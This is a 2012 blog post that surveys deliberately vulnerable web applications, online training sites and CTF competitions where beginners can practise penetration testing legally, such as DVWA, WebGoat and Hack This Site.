Thursday, March 1, 2012

Vulnerable by Definition

A lot of people, somehow related to security, want to try pentesting from time to time. Most often they start with web applications. The barriers to entry are rather low (the simplest SQL Injection vulnerability can be detected by adding a quotation mark in a parameter and its exploitation is almost as simple), but still there are difficult tasks that require several days of thorough work.

However, where can theoretical knowledge be implemented without any fear of being prosecuted by law-enforcement authorities? There is an overview of ‘proving grounds’ for pentest experiments under the cut.

All the ‘proving grounds’ can be divided into the following categories and subcategories:

  • Complete OS images with a set of vulnerable services, including vulnerable web applications
  • Distribution kits of vulnerable web applications (offline)
  • Vulnerable web applications which are close to real ones (online)
  • Vulnerable web applications in the CTF format (online)

Distribution kits of vulnerable web applications (offline)

Vulnerable distribution kits are the easiest to exploit, since they do not require creating a sandbox as with online applications.

The Mutillidae project contains all the vulnerabilities described in OWASP Top 10. OWASP Top 10 is an annually updated list of 10 vulnerabilities, the attention to which should be paid both by developers and security specialists.

Several tasks are available for each vulnerability from the Top 10 list:

It is possible to change the application’s security level and enable hints:


Scripts are executed with full privileges; the result is evident — command injection:

Currently, version  2.0.7  is available.

OWASP Webgoat

This time it is the OWASP project. Apart from the scripts it also includes a web server (TomCat). It can be started right on the working computer using a .bat file.

One aspect differs from Mutillidae significantly — it requires not only executing something but achieving specific results. When the result is achieved, it will be marked in the tasks list:

Some tasks require implementing security in the code instead of hacking.

Information about the project is available here.

In case of any difficulties, you can use a demonstration video for each task: (the links are available on the task pages).

Damn Vulnerable Web App (DVWA)

This project is similar to Mutillidae. It means that instead of exact tasks to be performed, there is a set of scripts with standard vulnerabilities:

  • Brute Force
  • Command Execution
  • CSRF
  • File Inclusion
  • SQL Injection
  • SQL Injection (Blind)
  • Upload
  • Reflected XSS
  • Stored XSS

The result is shown maximally close to what you would get in real life:

Currently, version 1.0.7 is available.

Vulnerable web applications which are close to real ones (online)

Acunetix test sites

Acunetix provides its tests on the following vulnerable websites:

You can also dig into the vulnerabilities manually.


Below is a set of sites exposed to XSS. For successful exploitation, it is necessary to bypass filtering system, which sometimes requires thinking beyond the box.

Vulnerable web applications in the CTF format (online)

In my opinion, it is the most pleasant part. All tasks should be carried out online, so installation of any additional software is not needed. And there is an explicit aim, which should be achieved (to capture a flag).

Hack This Site

The project provides a set of so-called missions grouped according to their difficulty levels. There are basic missions, such as to obtain and list the contents of a file in a directory with a script.

There are also missions with close to real life conditions, for example, to get the full list of the registered users' e-mail addresses (of course, it is a training site with hackthissite))

There is a forum for each mission, where you can learn different hints or the whole task performance. You can register and try to accomplish the missions here.


It is a similar project with different basic missions, where a password (flag) is contained, for example, in the source code:

Or where the simplest SQL Injection should be performed:

And certainly there are missions which involve sites with close to real life conditions, where it is necessary to use various methods to search a flag:

CCTF limited in time
Finally, there are CTF competitions, which include tasks of various types: from web applications hacking to reversing and forensics. The calendar of the forthcoming events is available here:

The previous tasks are also available on this site. The description of the CTF competitions and writeup of the tasks are usually published by the winners (such teams as Leet More, EINDBAZEN, PPP), they are also available on specialized forums, for example, rdot:

It is also possible to find images of virtual machines from the past competitions. For instance, from PHD 2011:

Or from iCTF and ruCTF:

Instead of conclusion

Beside the abovementioned ranges there are a lot of interesting things, but I'm short of time to test them all, so I just give links to some blogs:

Автор: Игорь Булатенко, эксперт исследовательского центра Positive Research 

1 comment: